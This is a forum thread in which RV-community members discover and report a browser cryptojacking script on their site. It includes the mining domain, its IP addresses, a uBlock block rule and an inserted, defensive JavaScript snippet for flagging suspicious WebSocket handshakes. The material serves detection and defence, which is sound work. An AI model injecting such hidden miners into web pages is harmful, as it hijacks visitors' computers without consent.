Fiberglass RV

Fiberglass RV (https://www.fiberglassrv.com/forums/)
-   Forum Admin, News & Announcements (https://www.fiberglassrv.com/forums/f65/)
-   -   BITCOIN MINER on this site?!? (https://www.fiberglassrv.com/forums/f65/bitcoin-miner-on-this-site-85739.html)

Alex Adams 06-29-2018 02:30 PM

Malwarebytes Showing Riskware popup from Forums
 
1 Attachment(s)
I don't know if anyone else is seeing this, but I keep getting a riskware warning popup from Malwarebytes that shows a .ru web address. It only pops up when I am in the Forum. If I click on the Manufacturer's tab it stops. Here is what I am seeing:

Steve Carlson 06-29-2018 02:46 PM

I have not been seeing that, and I have Malwarebytes at home.

Alex Adams 06-29-2018 02:50 PM

Steve is that the free or pay version? Mine is the pay version.

Byron Kinnaman 06-29-2018 03:19 PM

My guess is that it's a ghost. This site is processor hungry and I believe some malware protection software measures the amount of CPU capacity used. Which could give a false alarm.




The IP listed on your screen shot is from Germany. I don't know where this site is hosted or gets its advertising.

Steve Carlson 06-29-2018 03:35 PM

Quote:

Originally Posted by Alex Adams (Post 704248)
Steve is that the free or pay version? Mine is the pay version.

Pay.

John in Santa Cruz 06-29-2018 05:23 PM

ah, my uBlock advertising filter is showing that .ru URL being used by a websocket, too... guessing there's some malware sliding in via the advertising stream, or the massive number of tracking scripts this site loads.

I'm trying to figure out where it's being invoked from... so far, I've just found this mostly useless info about it.

Request URL: wss://www.qlzwfzfatjth.ru/
Request Method: GET
Status Code: 101 Switching Protocols
HTTP/1.1 101 Switching Protocols
connection: Upgrade
date: Fri, 29 Jun 2018 23:19:44 GMT
sec-websocket-accept: 55L4VKDFS/6B8v0yDa9VM6P3UDM=
server: Cowboy
upgrade: websocket
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: Upgrade
Host: www.qlzwfzfatjth.ru
Origin: The Fiberglass RV Community
Pragma: no-cache
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Sec-WebSocket-Key: LAcnQeSDQ3EfCgpKAURlig==
Sec-WebSocket-Version: 13
Upgrade: websocket
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
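An added example, not part of any post in this thread: one way to triage a DevTools header dump like the one quoted above and decide whether a page has opened a WebSocket to an unrelated site. The function names, the allowlist parameter, the two-label "site" rule and the consonant-run heuristic are assumptions made for illustration; the sample input is a constructed, trimmed copy of the quoted headers.

```javascript
// Constructed sample: trimmed copy of the handshake headers quoted in the post.
const SAMPLE_DUMP = `Request URL: wss://www.qlzwfzfatjth.ru/
Request Method: GET
Status Code: 101 Switching Protocols
connection: Upgrade
server: Cowboy
upgrade: websocket
Host: www.qlzwfzfatjth.ru
Sec-WebSocket-Version: 13
Upgrade: websocket`;

// Parse "Name: value" lines as copied from the browser's Network panel.
// Names are lower-cased; the first occurrence of a name wins.
function parseHeaderDump(text) {
  const fields = new Map();
  for (const line of text.split(/\r?\n/)) {
    const idx = line.indexOf(':');
    if (idx <= 0) continue;                       // e.g. a bare status line
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    if (!fields.has(name)) fields.set(name, value);
  }
  return fields;
}

// Simplification (assumption): treat the last two DNS labels as the "site".
// A production check would consult the Public Suffix List instead.
function siteOf(host) {
  return host.toLowerCase().split('.').slice(-2).join('.');
}

// Crude hint that a label was machine-generated: the longest run of
// consecutive consonants. Real words rarely exceed four.
function longestConsonantRun(label) {
  let best = 0;
  let run = 0;
  for (const ch of label.toLowerCase()) {
    if (/[a-z]/.test(ch) && !'aeiou'.includes(ch)) {
      run += 1;
      if (run > best) best = run;
    } else {
      run = 0;
    }
  }
  return best;
}

// Decide whether the dump shows a completed WebSocket upgrade to a site
// other than the page's own and not on the caller's allowlist.
function assessHandshake(dumpText, pageHost, allowedSites = []) {
  const f = parseHeaderDump(dumpText);
  const rawUrl = f.get('request url');
  if (!rawUrl) throw new Error('dump has no "Request URL" line');
  const url = new URL(rawUrl);

  const isWebSocket =
    ['ws:', 'wss:'].includes(url.protocol) &&
    /^101\b/.test(f.get('status code') || '') &&
    (f.get('upgrade') || '').toLowerCase() === 'websocket';

  const site = siteOf(url.hostname);
  const thirdParty = site !== siteOf(pageHost);
  const allowed = allowedSites.map((s) => s.toLowerCase()).includes(site);
  const consonantRun = longestConsonantRun(site.split('.')[0]);

  const reasons = [];
  if (isWebSocket && thirdParty && !allowed) {
    reasons.push(`WebSocket upgrade to third-party site ${site}`);
  }
  if (consonantRun >= 5) {
    reasons.push(`host label looks generated (consonant run ${consonantRun})`);
  }

  return {
    host: url.hostname,
    site,
    isWebSocket,
    thirdParty,
    allowed,
    consonantRun,
    suspicious: isWebSocket && thirdParty && !allowed,
    reasons,
    blockLine: site, // bare domain, the form used in a custom filter list
  };
}

const verdict = assessHandshake(SAMPLE_DUMP, 'www.fiberglassrv.com');
console.log(verdict.suspicious, verdict.reasons, verdict.blockLine);
```

The same function can be run over every WebSocket entry copied from the Network panel; anything it flags is a candidate for a custom filter line and for a report to the site's operators.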

John in Santa Cruz 06-29-2018 05:26 PM

all the communications over that websocket are encrypted/hashed so it just looks like random garbage, but data is being sent to it fairly regularly while this site is open.

John in Santa Cruz 06-29-2018 05:29 PM

crap, that domain is associated with a bitcoin miner trojan.

I think someone has infected this website and is using our browsers to mine bitcoin. there are an insane number of obfuscated/encrypted javascript 'apps' associated with this site, far more than a simple web forum has any possible legitimate use for.

John in Santa Cruz 06-29-2018 05:32 PM

I added qlzwfzfatjth.ru to my uBlock Origin custom blockers list, and WOW, the 80% CPU usage has gone entirely away.

John in Santa Cruz 06-29-2018 05:37 PM

BITCOIN MINER on this site?!?
 
So several of us have commented that this site, when left open, consumes nearly 100% of a CPU core the entire time it's open.

I did some more digging and found via the Chrome domain inspector and my uBlock Origin adware blocker that there's a websocket being opened to a Russian obfuscated URL from some seriously obfuscated javascript code, I can't track down where the reference is coming from, but it's hitting websocket wss://www.qlzwfzfatjth.ru/ every couple seconds with an encrypted string of junk.

https://www.fiberglassrv.com/forums/f...tml#post704268

when I google that domain name, I find references to it in bitcoin mining hackery, I do believe someone has hacked this server, or one of the related advertising servers and has injected a coin miner.

PLEASE FIX THIS ASAP.

John in Santa Cruz 06-29-2018 05:56 PM

extra fun, the websocket?

$ host www.qlzwfzfatjth.ru
www.qlzwfzfatjth.ru has address 144.76.58.136
www.qlzwfzfatjth.ru has address 85.10.201.70
www.qlzwfzfatjth.ru has address 144.76.32.66
www.qlzwfzfatjth.ru has address 5.9.61.75
www.qlzwfzfatjth.ru has address 144.76.91.146
www.qlzwfzfatjth.ru has address 5.9.110.228
www.qlzwfzfatjth.ru has address 5.9.67.171
www.qlzwfzfatjth.ru has address 144.76.76.226
www.qlzwfzfatjth.ru has address 144.76.65.203
www.qlzwfzfatjth.ru has address 5.9.81.135
www.qlzwfzfatjth.ru has address 85.10.201.199
www.qlzwfzfatjth.ru has address 144.76.68.4
www.qlzwfzfatjth.ru has address 144.76.40.218


man, that's a lotta different IPs

144.76.58.* is in germany
85.10.201 is also in germany
5.9.*.* is in germany...

in fact all of these are part of "Hetzner Online GmbH", I have no idea who they are, but google suggests they are a large hosting and datacenter operator.

Alex Adams 06-29-2018 06:18 PM

I was afraid of that. Hopefully the moderators will check this and do something. I tend to be paranoid when it comes to the internet. I've been running antivirus and anti-malware since it has been available even before some upstart kid named McAfee got started!

John in Santa Cruz 06-29-2018 06:30 PM

Adding that qxxxx domain (without any www.) to my uBlock spam list has stopped the 100% CPU usage.

Alex Adams 06-29-2018 06:42 PM

Steve, check your settings in Malwarebytes. Something like Realtime Protection is turned off. You should be getting the same messages I am.

John in Santa Cruz 06-29-2018 08:19 PM

if you're using Chrome or Firefox, install the free plugin uBlock Origin (which is superior to adblock plus or whatever). click the UO icon in the toolbar, select 'dashboard', and on the "My Filters" tab, at the bottom add a line with just...

qlzwfzfatjth.ru


and click "Apply Changes", and you can close the ublock dashboard tab in your browser.

Byron Kinnaman 06-29-2018 11:15 PM

Quote:

Originally Posted by John in Santa Cruz (Post 704291)
if you're using Chrome or Firefox, install the free plugin uBlock Origin (which is superior to adblock plus or whatever). click the UO icon in the toolbar, select 'dashboard', and on the "My Filters" tab, at the bottom add a line with just...

qlzwfzfatjth.ru


and click "Apply Changes", and you can close the ublock dashboard tab in your browser.

Thank you,,, Big improvement.

John in Santa Cruz 06-30-2018 01:25 AM

Somehow the page is loading this piece of heavily obfuscated code, 186k of crypted crud.... I've deleted the middle so the message fits, with ... in two places.

blob:https://www.fiberglassrv.com/f896f15c...7-09045c289faa



VtSusan 06-30-2018 06:32 AM

Quote:

Originally Posted by John in Santa Cruz (Post 704291)
if you're using Chrome or Firefox, install the free plugin uBlock Origin (which is superior to adblock plus or whatever). click the UO icon in the toolbar, select 'dashboard', and on the "My Filters" tab, at the bottom add a line with just...

qlzwfzfatjth.ru


and click "Apply Changes", and you can close the ublock dashboard tab in your browser.

Thank you, John! I was ready to quit using the forum. In the past few weeks, every time I opened the forum page the fan on my computer started up, meaning some heavy duty processing happening. This made me wonder what the heck was going on, and worried it was something not good. I installed your fix and no more fan starting up!

Tom 72 06-30-2018 10:10 AM

Interesting, John
My first reaction was to chuckle, thinking there are no coins to be mined here. But that isn't the point.

The point is to potentially use members' processors remotely as part of a massive computing effort, perhaps without members knowing.

Is it possible? Some may recall SETI, Seti.org is a site that used to harness idle processing power from volunteers to Search Extra Terrestrial life - UFOs. SETI is still around, their focus seems to have shifted.

Some trojan viruses create massive computing power without users' consent or knowledge. It is possible. It should be evaluated.

Mary F 06-30-2018 10:11 AM

We have notified our tech people about this issue.

Thanks to all for the heads up. :bowdown

I join you in hoping it can be addressed ASAP!

floyd 06-30-2018 10:59 AM

So what should the average comparative Luddite member here do to protect himself, if anything?


What can the site do to remedy the problem?


Could this be the cause of a slow CPU which requires a restart to get back to normal?

Daniel A. 06-30-2018 11:52 AM

My Kaspersky keeps blocking it, it's been doing this for the last couple of days.

Janet H 06-30-2018 11:53 AM

Quote:

Originally Posted by Daniel A. (Post 704365)
My Kaspersky keeps blocking it, it's been doing this for the last couple of days.

We are actively looking at this - thanks for your patience.

Daniel A. 06-30-2018 12:01 PM

Thanks, the message I get says


Dangerous URL blocked.
URL listed in database of malicious ULR's

John in Santa Cruz 06-30-2018 12:30 PM

btw, that block of obfuscated code in my post #3 on this thread, I have no way of knowing if that's what's actually invoking the WebSocket calls to the .ru site or not, as the code is totally obfuscated.... makes it really hard to trace what's going on.

John in Santa Cruz 06-30-2018 12:38 PM

Quote:

Originally Posted by Tom 72 (Post 704338)
Interesting, John
My first reaction was to chuckle, thinking there are no coins to be mined here. But that isn't the point.

The point is to potentially use members' processors remotely as part of a massive computing effort, perhaps without members knowing.

Is it possible? Some may recall SETI, Seti.org is a site that used to harness idle processing power from volunteers to Search Extra Terrestrial life - UFOs. SETI is still around, their focus seems to have shifted.

Some trojan viruses create massive computing power without users' consent or knowledge. It is possible. It should be evaluated.

that's exactly what this trojan is doing... it's using everyone's web browser to 'mine' some sort of cryptocurrency (bitcoin is only one of dozens of similar things) ...

Friz 06-30-2018 12:44 PM

Has anybody tried this malicious site running Linux? If the website tries to run executable code, either nothing happens or the browser usually freezes.

Janet H 06-30-2018 01:54 PM

We've located the issue and disabled the Registry display in the side bar for now. There appeared to be a malicious link that was exploiting CPUs (as speculated earlier on this thread). The link and associated flotsam has been removed.


There should be no issue at this point for local systems as the only purpose of the link was to mine for bitcoin by leveraging CPUs. After examining the link and associated information we are confident that nothing was downloaded to local systems and there was no access to member information or the site's database.

You can read more about crypto mining here: https://en.wikipedia.org/wiki/Bitcoin

sokhapkin 06-30-2018 03:19 PM

Quote:

Originally Posted by Friz (Post 704388)
Has anybody tried this malicious site running Linux? If the website tries to run executable code, either nothing happens or the browser usually freezes.

It doesn't matter which OS you run. I run Linux. The malicious code is javascript which is being executed by your web browser. It is OS-independent.

John in Santa Cruz 07-01-2018 12:25 AM

per the other thread on this, the 'house' has fixed the problem :) had something to do with the 'registry' sidebar, so they turned that off. so mitigations like blocking that qxxxxxxx.ru URL, probably not needed.

Patdeesky 07-01-2018 12:52 AM

My entire empire of 1 imaginary bitcoin for a trailer please.... /sarc if no one catches it/

John in Santa Cruz 07-01-2018 01:00 AM

my older kid, a postgrad research assistant, has made a fair bit of money playing the coin market. he wasn't mining, he was doing arbitrage stuff, buying and selling positions. he pulled 4-5X his initial investment in cash when he got out.

Glenn Baglo 07-01-2018 09:14 AM

With the site fix, I can now use my MacBook Air laptop without frying my thighs.
Recently, it had gotten so hot that I would shut it down. Makes me wonder about damage to computers that are victims.


As for Bitcoin, I'd like to know how you can mine something that doesn't exist. Actually, no I don't want to know. Recent stories about how these "currencies" were manipulated to generate profits for some.

Civilguy 07-01-2018 09:42 AM

I reported this to the mods yesterday and said that I didn't have the same symptoms. Then I came to realize that it was running about 40% of my processor. Maybe my computer is one of the slower kids, like me? :u

I installed uBlock Origin on my desktop a few months ago. I was conflicted about this as ads are what pays for the operation of many web sites. I have to say that this Chrome extension has done a really great job of corralling some of the most obnoxious ads.

Somewhat off-topic, I am one of the people that sends a few dollars to pay for Irfanview, MP3Tag, and Fiberglass-RV-for-sale before I even listed a trailer on their site; things like that. The Internet is not really free folks; that's why our information is now one of the primary products being marketed. I will posit that almost nothing costs so much as something billed as being "free".

End of lecture, TYVM.

Carl V 07-01-2018 10:04 AM

Quote:

Originally Posted by Glenn Baglo (Post 704528)
With the site fix, I can now use my MacBook Air laptop without frying my thighs.
Recently, it had gotten so hot that I would shut it down. Makes me wonder about damage to computers that are victims.

Macbook Pro here. Never had any issue like that with this site (or any other).
I figured this was a Windows thing...

Strange...!

Jon Vermilye 07-01-2018 10:40 AM

Quote:

Originally Posted by Carl V (Post 704542)
Macbook Pro here. Never had any issue like that with this site (or any other).
I figured this was a Windows thing...

Strange...!

Nope. I've often had the cooling fans come on in my MacBookPro when here at Fiberglass RV for no apparent reason. Didn't happen today...

Jon in AZ 07-02-2018 10:42 AM

Fixed!
 
Same here with my MacBook Pro. It was a recent problem, and I had been using my mobile device via the app most of the time as a result.

It is now fixed, as reported by site admins elsewhere. All is back to normal on my Mac, too.

Quick response from the site team!!! :thumb

Doctor Harold 07-02-2018 11:47 AM

Bitcoin is not much different than the money in your wallet. Paper dollars only have value because we all agree that they do, and we trust the US government to back that up. Ever hear the expression about some failed country's money that it's not worth the paper it's printed on?

Most dollars that exist in the American economy do not exist as paper. The money in your checking account, savings account, the money you owe on your credit card, and the balance owed on your mortgage, as well as the money you consider equity used to exist as notations on a ledger sheet, and now only in a computer file.

Whether it's seashells, dollars, bitcoin, gold bars, or wampum, the value only exists because we believe -- and agree -- that it exists.

Without agreement on the value of a particular form of money, that money ceases to exist. In other words: all money is basically imaginary.

Mike Magee 07-03-2018 05:41 PM

Quote:

Originally Posted by Doctor Harold (Post 704799)
Bitcoin is not much different than the money in your wallet. Paper dollars only have value because we all agree that they do, and we trust the US government to back that up. Ever hear the expression about some failed country's money that it's not worth the paper it's printed on?

Most dollars that exist in the American economy do not exist as paper. The money in your checking account, savings account, the money you owe on your credit card, and the balance owed on your mortgage, as well as the money you consider equity used to exist as notations on a ledger sheet, and now only in a computer file.

Whether it's seashells, dollars, bitcoin, gold bars, or wampum, the value only exists because we believe -- and agree -- that it exists.

Without agreement on the value of a particular form of money, that money ceases to exist. In other words: all money is basically imaginary.

Shhhh. Don't stampede the herd. ;)

Doctor Harold 07-03-2018 08:03 PM

Quote:

Originally Posted by Mike Magee (Post 705138)
Shhhh. Don't stampede the herd. ;)

:roflol


All times are GMT -6.